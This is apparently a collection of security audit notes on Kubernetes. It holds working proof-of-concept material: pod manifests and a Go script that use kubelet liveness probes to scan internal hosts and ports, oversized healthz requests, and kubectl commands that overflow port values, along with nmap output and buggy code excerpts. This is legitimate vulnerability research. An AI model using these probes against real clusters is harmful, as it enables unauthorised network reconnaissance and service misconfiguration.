trailofbits / audit-kubernetes
k8s audit repo
When defining a pod, it is possible to specify liveness probes. These probes are executed by the kubelet, from the kubelet's own process. Thus, it is possible to gain access to networks which may otherwise be isolated from a container.
To enumerate the host network, an attacker could submit N pods with TCP or HTTP host and port specifications for the liveness probe, and then identify whether each host and port combination is reachable by the kubelet. Example below.
Pod manifest:
apiVersion: v1
kind: Pod
metadata:
  labels:
    test: liveness
  name: liveness-http
spec:
  containers:
  - name: liveness
    image: k8s.gcr.io/liveness
    args:
    - /server
    ports:
    livenessProbe:
      httpGet:
        host: 172.31.6.71
        path: /
        port: 8000
        httpHeaders:
        - name: Custom-Header
          value: Awesome
      initialDelaySeconds: 3
      periodSeconds: 3
Pod deployment:
root@node1:/home/ubuntu# date
Mon Apr 8 14:44:29 UTC 2019
root@node1:/home/ubuntu# kubectl apply -f probe_test.yaml
pod/liveness-http created
root@node1:/home/ubuntu# date
Mon Apr 8 14:44:34 UTC 2019
Accessing another host on the network:
ubuntu@ip-172-31-6-71:~$ date
Mon Apr 8 14:44:26 UTC 2019
ubuntu@ip-172-31-6-71:~$ python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 ...
172.31.24.249 - - [08/Apr/2019 14:44:40] "GET / HTTP/1.1" 200 -
172.31.24.249 - - [08/Apr/2019 14:44:43] "GET / HTTP/1.1" 200 -
172.31.24.249 - - [08/Apr/2019 14:44:46] "GET / HTTP/1.1" 200 -
172.31.24.249 - - [08/Apr/2019 14:44:49] "GET / HTTP/1.1" 200 -
172.31.24.249 - - [08/Apr/2019 14:44:52] "GET / HTTP/1.1" 200 -
Liveness information yielded by the pod:
Ready: True
Restart Count: 0
Liveness: http-get http://172.31.6.71:8000/ delay=3s timeout=1s period=3s #success=1 #failure=3
Pod status denoting the external host and port is available:
root@node1:/home/ubuntu# kubectl get pods
NAME READY STATUS RESTARTS AGE
liveness-http 1/1 Running 0 41s
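The enumeration described above can be scripted. The following is a minimal sketch (pod names, the target host, and the port list are illustrative, not from the audit) that emits one probe pod per candidate port; after applying the output, pod status reveals reachability:

```go
package main

import "fmt"

// probePodYAML renders a liveness-probe pod manifest targeting host:port.
// After `kubectl apply`, a pod that stays Running means the kubelet could
// reach host:port; repeated restarts mean it could not.
func probePodYAML(host string, port int) string {
	return fmt.Sprintf(`---
apiVersion: v1
kind: Pod
metadata:
  name: probe-%d
spec:
  containers:
  - name: liveness
    image: k8s.gcr.io/liveness
    args: ["/server"]
    livenessProbe:
      httpGet:
        host: %s
        path: /
        port: %d
      initialDelaySeconds: 3
      periodSeconds: 3
`, port, host, port)
}

func main() {
	// One pod per candidate port on the target host.
	for _, port := range []int{22, 80, 8000} {
		fmt.Print(probePodYAML("172.31.6.71", port))
	}
}
```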
The healthz check running on the apiserver does not appear to correctly handle responses of unexpected sizes, resulting in a response containing metadata about the structures in the service response (string sizes). The following shows a request executed against the healthz endpoint:
root@ubuntu-test-1:~# cat thing3
GET /healthz?verbose&exclude=test,test HTTP/1.1
Host: 172.17.0.4:6443
Accept: */*
root@ubuntu-test-1:~# cat thing3 |ncat 172.17.0.4 6443 --ssl
HTTP/1.1 200 OK
Date: Wed, 24 Apr 2019 21:11:41 GMT
Content-Length: 825
Content-Type: text/plain; charset=utf-8
[+]ping ok
[+]log ok
[+]etcd ok
[+]poststarthook/generic-apiserver-start-informers ok
[+]poststarthook/start-apiextensions-informers ok
[+]poststarthook/start-apiextensions-controllers ok
[+]poststarthook/bootstrap-controller ok
[+]poststarthook/rbac/bootstrap-roles ok
[+]poststarthook/scheduling/bootstrap-system-priority-classes ok
[+]poststarthook/ca-registration ok
[+]poststarthook/start-kube-apiserver-admission-initializer ok
[+]poststarthook/start-kube-aggregator-informers ok
[+]poststarthook/apiservice-registration-controller ok
[+]poststarthook/apiservice-status-available-controller ok
[+]poststarthook/apiservice-openapi-controller ok
[+]poststarthook/kube-apiserver-autoregistration ok
[+]autoregister-completion ok
warn: some health checks cannot be excluded: no matches for "test,test"
healthz check passed
The verbose parameter shows detailed information about the request being executed, and the exclude parameter instructs the endpoint which health checks should be skipped. By providing a large exclude list, the service responds with artifacts related to response object sizes, as seen in the following response:
root@ubuntu-test-1:~# cat thing2
GET /healthz?verbose&exclude=tddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testdd
d,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testdstdd HTTP/1.1
Host: 172.17.0.4:6443
Accept: */*
root@ubuntu-test-1:~# cat thing2 |ncat 172.17.0.4 6443 --ssl
HTTP/1.1 200 OK
Date: Wed, 24 Apr 2019 21:12:35 GMT
Content-Type: text/plain; charset=utf-8
Transfer-Encoding: chunked
f89
[+]ping ok
[+]log ok
[+]etcd ok
[+]poststarthook/generic-apiserver-start-informers ok
[+]poststarthook/start-apiextensions-informers ok
[+]poststarthook/start-apiextensions-controllers ok
[+]poststarthook/bootstrap-controller ok
[+]poststarthook/rbac/bootstrap-roles ok
[+]poststarthook/scheduling/bootstrap-system-priority-classes ok
[+]poststarthook/ca-registration ok
[+]poststarthook/start-kube-apiserver-admission-initializer ok
[+]poststarthook/start-kube-aggregator-informers ok
[+]poststarthook/apiservice-registration-controller ok
[+]poststarthook/apiservice-status-available-controller ok
[+]poststarthook/apiservice-openapi-controller ok
[+]poststarthook/kube-apiserver-autoregistration ok
[+]autoregister-completion ok
warn: some health checks cannot be excluded: no matches for "tddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testdd
d,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testddd,testdstdd"
15
healthz check passed
0
In this response, the Content-Length header is removed and replaced by Transfer-Encoding: chunked, and string sizes are included, as seen in the following excerpt:
Transfer-Encoding: chunked
f89
[+]ping ok
It was not immediately clear what the source of these artifacts was, and as there was no security implication, a root cause was not fully investigated. (The values are consistent with HTTP/1.1 chunked transfer-coding length prefixes; e.g., 0xf89 is 3977 bytes.) The following function defines the healthz service handler:
kubernetes/healthz.go at v1.13.4 · kubernetes/kubernetes · GitHub
Carry out a request with a long exclude parameter, as seen in the finding description.
Ensure services are able to cleanly handle unexpected user input.
Don't do this:
pkg/kubectl/cmd/taint/taint.go
218: conflictTaint := fmt.Sprintf("{\"%s\":\"%s\"}", taintRemove.Key, taintRemove.Effect)
pkg/kubectl/cmd/get/customcolumn.go
62: return fmt.Sprintf("{.%s}", fieldSpec), nil
also, @tomsteele pointed out that YAML could be an interesting direction (but we'll probably push out another issue there). There's some Mustache and other weirdness in here as well...
A Malicious Internal User is a user, such as an administrator or developer, who uses their privileged position against the system, or an attacker using stolen credentials to the same effect. This scenario is more focused on what logging, auditing, roles, and NAC can do to prevent such credential abuse.
When a large manifest is placed in the kubelet manifest directory, the kubelet will attempt to boot the spec defined within the manifest. It does so without performing any size validation on the file, which results in an OOM error. The kubelet then recovers once the underlying system recovers, and attempts to start the spec again. This leads to an unrecoverable loop.
In kubelet/prober/prober.go:
func extractPort(param intstr.IntOrString, container v1.Container) (int, error) {
	port := -1
	var err error
	switch param.Type {
	// (...)
	case intstr.String:
		if port, err = findPortByName(container, param.StrVal); err != nil {
			// Last ditch effort - maybe it was an int stored as string?
			if port, err = strconv.Atoi(param.StrVal); err != nil {
				return port, err
			}
		}
	}
	// (...)
}
The code incorrectly handles the case mentioned in the comment: if the port parsing succeeds (so err == nil), the parsed port is never used. Currently, this branch may return either 0 or the maximum integer value (when param.StrVal is too big to be parsed).
The extractPort function is called twice by runProbe: when extracting the HTTP port in src/kubernetes-1.13.4/pkg/kubelet/prober/prober.go:160, and the TCP socket port in src/kubernetes-1.13.4/pkg/kubelet/prober/prober.go:176.
It seems that this value comes from the pod configuration. The outcome of a wrong value could be that a given pod is not detected as live when probing it?
By default, bufio.Scanner does not set a capacity, so an attacker with control over a file that is being read in can DoS the system with an OOM anywhere the following pattern is met:
pkg/kubectl/cmd/get/customcolumn.go:91: lineScanner := bufio.NewScanner(bytes.NewBufferString(line))
pkg/kubectl/cmd/get/customcolumn.go:92: lineScanner.Split(bufio.ScanWords)
Basically, anywhere you create a NewScanner but do not call Buffer on it with a fixed buffer (len of 0, but cap of some fixed size), you can effectively OOM via the Scanner. There's lots of this throughout the code base; I first noticed it because ABAC is actually a list of single-line JSON objects (screams internally)
from https://github.com/kubernetes/kubernetes/blob/master/cmd/linkcheck/links.go#L133-L140
Some background: https://github.com/trailofbits/audit-kubernetes/blob/master/notes/dominik.czarnota/linkcheck.md
retryAfter := resp.Header.Get("Retry-After")
if seconds, err := strconv.Atoi(retryAfter); err != nil {
	backoff = seconds + 10
}
fmt.Fprintf(os.Stderr, "Got %d visiting %s, retry after %d seconds.\n", resp.StatusCode, string(URL), backoff)
TLDR: the err != nil condition is inverted. If Atoi fails, seconds is always 0 (so the branch sets backoff = 10); if it succeeds, the seconds retrieved from the Retry-After header are never used.
Also: there should be an upper bound on the Retry-After header value - otherwise someone can stall/delay/sleep the build for a long time (e.g., by running linkcheck over a malicious branch).
The issue is still present on the master branch, as of the time of writing this issue: https://github.com/kubernetes/kubernetes/blob/e739b553747940324cf4a91429aea905371f89a1/cmd/linkcheck/links.go#L132-L140
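A sketch of the corrected logic (the inverted condition flipped, plus the upper bound suggested above; the cap value and function name are ours):

```go
package main

import (
	"fmt"
	"strconv"
)

// backoffFor computes a retry delay from a Retry-After header value.
// Unlike the linkcheck code, it uses the parsed value only when parsing
// succeeds, and bounds it so a malicious server cannot stall the build.
func backoffFor(retryAfter string) int {
	const maxBackoff = 120 // hypothetical cap, in seconds
	backoff := 10
	if seconds, err := strconv.Atoi(retryAfter); err == nil { // err == nil, not != nil
		backoff = seconds + 10
	}
	if backoff > maxBackoff {
		backoff = maxBackoff
	}
	return backoff
}

func main() {
	fmt.Println(backoffFor("30"))      // parsed value is actually used
	fmt.Println(backoffFor("garbage")) // falls back to the default
	fmt.Println(backoffFor("999999"))  // capped, cannot stall the build
}
```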
Starting Nmap 7.60 ( https://nmap.org ) at 2019-04-18 21:56 UTC
Initiating Connect Scan at 21:56
Scanning 2 hosts [1000 ports/host]
Discovered open port 22/tcp on 172.31.28.169
Discovered open port 22/tcp on 172.31.24.249
Discovered open port 179/tcp on 172.31.28.169
Discovered open port 179/tcp on 172.31.24.249
Discovered open port 8081/tcp on 172.31.24.249
Completed Connect Scan against 172.31.28.169 in 0.06s (1 host left)
Completed Connect Scan at 21:56, 0.06s elapsed (2000 total ports)
Nmap scan report for 172.31.24.249
Host is up, received user-set (0.0024s latency).
Scanned at 2019-04-18 21:56:06 UTC for 0s
Not shown: 997 closed ports
Reason: 997 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
179/tcp open bgp syn-ack
8081/tcp open blackice-icecap syn-ack
Nmap scan report for 172.31.28.169
Host is up, received user-set (0.0024s latency).
Scanned at 2019-04-18 21:56:06 UTC for 0s
Not shown: 998 closed ports
Reason: 998 conn-refused
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
179/tcp open bgp syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 2 IP addresses (2 hosts up) scanned in 0.10 seconds
By looking over some Atoi-related issues, I found this TODO:
// TODO(mg): check if the pubkey matches the private key
from https://github.com/miekg/dns/blob/master/dnssec_keyscan.go#L26-L42
This is vendored code, so it might be out of scope - but maybe Kubernetes uses this, and maybe there is a real vuln?
TODO: to be checked
An External Attacker is an attacker who is external to the cluster and is unauthenticated. In our case, that would be an attacker using our WordPress instance. I think Jenkins abuse would fall under Malicious Internal User.
This issue will contain write-ups/PoCs of atoi+int conversion overflows that we found, so we can add it to the report later.
// updatePodContainers updates PodSpec.Containers.Ports with passed parameters.
func updatePodPorts(params map[string]string, podSpec *v1.PodSpec) (err error) {
	port := -1
	hostPort := -1
	if len(params["port"]) > 0 {
		port, err = strconv.Atoi(params["port"]) // <-- this should parse port as strconv.ParseUint(params["port"], 10, 16)
		if err != nil {
			return err
		}
	}
	// (...)
	// Don't include the port if it was not specified.
	if len(params["port"]) > 0 {
		podSpec.Containers[0].Ports = []v1.ContainerPort{
			{
				ContainerPort: int32(port), // <-- this should later just be uint16(port)
			},
		}
	}
	// (...)
}
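The fix suggested in the inline comments above could look like this (a sketch; strconv.ParseUint with bitSize 16 rejects negative and out-of-range values outright, so no silent truncation can occur):

```go
package main

import (
	"fmt"
	"strconv"
)

// parsePort is a sketch of the suggested fix: ParseUint with bitSize 16
// fails on anything outside 0..65535 instead of wrapping modulo 2^32.
func parsePort(s string) (int32, error) {
	p, err := strconv.ParseUint(s, 10, 16)
	if err != nil {
		return 0, err
	}
	return int32(p), nil
}

func main() {
	for _, s := range []string{"80", "4294967377", "-1"} {
		p, err := parsePort(s)
		fmt.Printf("%q -> %d (err: %v)\n", s, p, err)
	}
}
```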
That's called via kubectl expose, so let's see it in action.
For the sake of example, I've created a deployment:
root@k8s-1:~# cat nginx.yml
apiVersion: apps/v1 # for versions before 1.9.0 use apps/v1beta2
kind: Deployment
metadata:
  name: nginx-deployment
spec:
  selector:
    matchLabels:
      app: nginx
  replicas: 1 # tells deployment to run 1 pod matching the template
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:1.7.9
        ports:
        - containerPort: 80
root@k8s-1:~# kubectl create -f nginx.yml
deployment.apps/nginx-deployment created
root@k8s-1:~# kubectl get pods
NAME READY STATUS RESTARTS AGE
nginx-deployment-76bf4969df-nskjh 1/1 Running 0 2m14s
I have no service related to this deployment atm:
root@k8s-1:~# kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.233.0.1 <none> 443/TCP 30m
Let's create a service and specify a port such that int32(4294967377) == 81:
root@k8s-1:/home/vagrant# kubectl expose deployment nginx-deployment --port 4294967377 --target-port 80
service/nginx-deployment exposed
This got exposed, so let's see services:
root@k8s-1:/home/vagrant# kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.233.0.1 <none> 443/TCP 42m
nginx-deployment ClusterIP 10.233.25.138 <none> 81/TCP 2s
It's there with port 81, let's connect:
root@k8s-1:/home/vagrant# curl 10.233.25.138:81
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
<p>For online documentation and support please refer to
<a href="http://nginx.org/">nginx.org</a>.<br/>
Commercial support is available at
<a href="http://nginx.com/">nginx.com</a>.</p>
<p><em>Thank you for using nginx.</em></p>
</body>
</html>
It works.
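The truncation behind the port choice is plain Go integer conversion: int32 keeps only the low 32 bits, and 4294967377 = 2^32 + 81.

```go
package main

import "fmt"

func main() {
	// The value passed to kubectl expose above; converting a variable
	// (not a constant) to int32 silently discards the high bits.
	port := int64(4294967377)
	fmt.Println(int32(port)) // prints 81: 4294967377 mod 2^32
}
```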
But there is more: the target-port can also be overflowed, and it shows slightly more interesting results.
Let's delete the service:
root@k8s-1:/home/vagrant# kubectl delete service nginx-deployment
service "nginx-deployment" deleted
root@k8s-1:/home/vagrant# kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.233.0.1 <none> 443/TCP 45m
root@k8s-1:/home/vagrant#
And now expose it again, now also overflowing the target port:
root@k8s-1:/home/vagrant# kubectl expose deployment nginx-deployment --port 4294967377 --target-port 4294967376
E0402 09:25:31.888983 3625 intstr.go:61] value: 4294967376 overflows int32
goroutine 1 [running]:
runtime/debug.Stack(0xc000e54eb8, 0xc4f1e9b8, 0xa3ce32e2a3d43b34)
/usr/local/go/src/runtime/debug/stack.go:24 +0xa7
k8s.io/kubernetes/vendor/k8s.io/apimachinery/pkg/util/intstr.FromInt(0x100000050, 0xa, 0x100000050, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/apimachinery/pkg/util/intstr/intstr.go:61 +0x62
k8s.io/kubernetes/pkg/kubectl/generate/versioned.generateService(0xc000d4b770, 0x0, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/generate/versioned/service.go:199 +0x1056
k8s.io/kubernetes/pkg/kubectl/generate/versioned.ServiceGeneratorV2.Generate(0xc000d4b770, 0x410bc20, 0x536d2d6, 0xa, 0xc000e55350)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/generate/versioned/service.go:50 +0x2b
k8s.io/kubernetes/pkg/kubectl/cmd/expose.(*ExposeServiceOptions).RunExpose.func1(0xc0004684d0, 0x0, 0x0, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:311 +0x45c
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.DecoratedVisitor.Visit.func1(0xc0004684d0, 0x0, 0x0, 0x8, 0x10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:315 +0xdc
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.ContinueOnErrorVisitor.Visit.func1(0xc0004684d0, 0x0, 0x0, 0xa, 0xc000e55838)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:339 +0x111
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.FlattenListVisitor.Visit.func1(0xc0004684d0, 0x0, 0x0, 0x38, 0xc000f7ad40)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:377 +0x81b
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.(*Info).Visit(0xc0004684d0, 0xc000f7ad40, 0xc000000300, 0xb9)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:92 +0x38
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.VisitorList.Visit(0xc0004a2a50, 0x1, 0x1, 0xc000f7ad40, 0x744dab9, 0x76)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:177 +0x63
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.FlattenListVisitor.Visit(0x74a78e0, 0xc000f936a0, 0x74bb200, 0xc00059de30, 0xc000dbcff0, 0xc000f93720, 0x744da58, 0x56)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:372 +0x86
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.ContinueOnErrorVisitor.Visit(0x74a78a0, 0xc000f79980, 0xc000f7ad00, 0xc00007d8b0, 0xc00007e2a0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:334 +0xc3
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.DecoratedVisitor.Visit(0x74a7820, 0xc0004a2ab0, 0xc000f936e0, 0x3, 0x4, 0xc000f8ef60, 0xc000000300, 0xc000e55b68)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/visitor.go:306 +0x86
k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource.(*Result).Visit(0xc000e17300, 0xc000f8ef60, 0x10, 0x10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/k8s.io/cli-runtime/pkg/genericclioptions/resource/result.go:99 +0x62
k8s.io/kubernetes/pkg/kubectl/cmd/expose.(*ExposeServiceOptions).RunExpose(0xc0002dc620, 0xc00052d400, 0xc00095f560, 0x2, 0x6, 0x0, 0x0)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:235 +0x2e7
k8s.io/kubernetes/pkg/kubectl/cmd/expose.NewCmdExposeService.func1(0xc00052d400, 0xc00095f560, 0x2, 0x6)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/pkg/kubectl/cmd/expose/expose.go:138 +0x9d
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).execute(0xc00052d400, 0xc00095f500, 0x6, 0x6, 0xc00052d400, 0xc00095f500)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:760 +0x2cc
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).ExecuteC(0xc000c91680, 0x4, 0xc000c91680, 0xc000a51f10)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:846 +0x2fd
k8s.io/kubernetes/vendor/github.com/spf13/cobra.(*Command).Execute(0xc000c91680, 0x7, 0xc0002e8a00)
/workspace/anago-v1.13.4-beta.0.55+c27b913fddd1a6/src/k8s.io/kubernetes/_output/dockerized/go/src/k8s.io/kubernetes/vendor/github.com/spf13/cobra/command.go:794 +0x2b
main.main()
_output/dockerized/go/src/k8s.io/kubernetes/cmd/hyperkube/main.go:64 +0x18f
service/nginx-deployment exposed
What is interesting here: we got an error (E0402 09:25:31.888983 3625 intstr.go:61] value: 4294967376 overflows int32), but also the information that the service got exposed: service/nginx-deployment exposed.
Let's see:
root@k8s-1:/home/vagrant# kubectl get services
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
kubernetes ClusterIP 10.233.0.1 <none> 443/TCP 46m
nginx-deployment ClusterIP 10.233.59.190 <none> 81/TCP 35s
It is there:
root@k8s-1:/home/vagrant# curl 10.233.59.190:81
<!DOCTYPE html>
<html>
<head>
<title>Welcome to nginx!</title>
<style>
body {
width: 35em;
margin: 0 auto;
font-family: Tahoma, Verdana, Arial, sans-serif;
}
</style>
</head>
<body>
<h1>Welcome to nginx!</h1>
<p>If you see this page, the nginx web server is successfully installed and
working. Further configuration is required.</p>
<p>For online documentation and support please refer to
